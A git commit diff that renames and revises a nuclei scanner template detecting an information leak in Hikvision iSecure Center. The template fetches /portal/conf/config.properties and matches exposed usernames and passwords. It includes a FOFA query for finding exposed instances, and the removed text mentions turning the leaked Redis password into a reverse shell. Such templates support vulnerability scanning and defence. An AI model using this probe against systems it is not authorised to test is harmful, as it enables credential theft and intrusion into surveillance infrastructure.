Update and rename hikvision-iSecure-info-leak.yaml to hikvision-ismp-info-leak.yaml

2024-07-24 16:18:07 +05:30 · 2024-07-24 16:18:07 +05:30 · 02762553d5
parent 051451c386
commit 02762553d5
2 changed files with 35 additions and 33 deletions
--- a/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
+++ b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
@ -1,33 +0,0 @@
-id: hikvision-iSecure-info-leak
-
-info:
-  name: zongheanfang-info-leak
-  author: adeljck
-  severity: critical
-  description: |
-    Hikvision iSecure Center /portal/conf/config.properties can get encrypted redis password,if server expose redis port.people can get a reverse shell with redis.
-  reference:
-    - https://github.com/adeljck/Hikvision_Info_Leak
-  metadata:
-    verified: true
-    max-request: 2
-    fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台",body="/portal/skin/ifar/blue/skin.css"
-  tags: infoleak,iot,hikvision
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/portal/conf/config.properties"
-    headers:
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
-      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
-      Accept-Encoding: gzip, deflate
-      Sec-Fetch-Dest: empty
-      Sec-Fetch-Mode: cors
-      Sec-Fetch-Site: same-origin
-      Te: trailers
-      Connection: close
-
-    matchers:
-      - type: word
-        words:
-          - 'password'
--- a/http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml
+++ b/http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml
@ -0,0 +1,35 @@
+id: hikvision-isecure-info-leak
+
+info:
+  name: HIKVISION iSecure Center - Information Leak
+  author: adeljck
+  severity: high
+  description: |
+    HIKVISION iSecure Center comprehensive security management platform is an "integrated" and "intelligent" platform. By accessing equipment such as video surveillance, all-in-one card, parking lot, alarm detection and other systems, Hikvision comprehensive security management platform information exists Information leakage (internal network centralized account password) vulnerability can be decrypted through decryption software, username and password.
+  reference:
+    - https://github.com/adeljck/Hikvision_Info_Leak
+    - https://github.com/wy876/POC/blob/main/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="HIKVISION-综合安防管理平台"
+  tags: infoleak,iot,hikvision
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/portal/conf/config.properties"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '@bic'
+          - 'username'
+          - 'password'
+        condition: and
+
+      - type: status
+        status:
+          - 200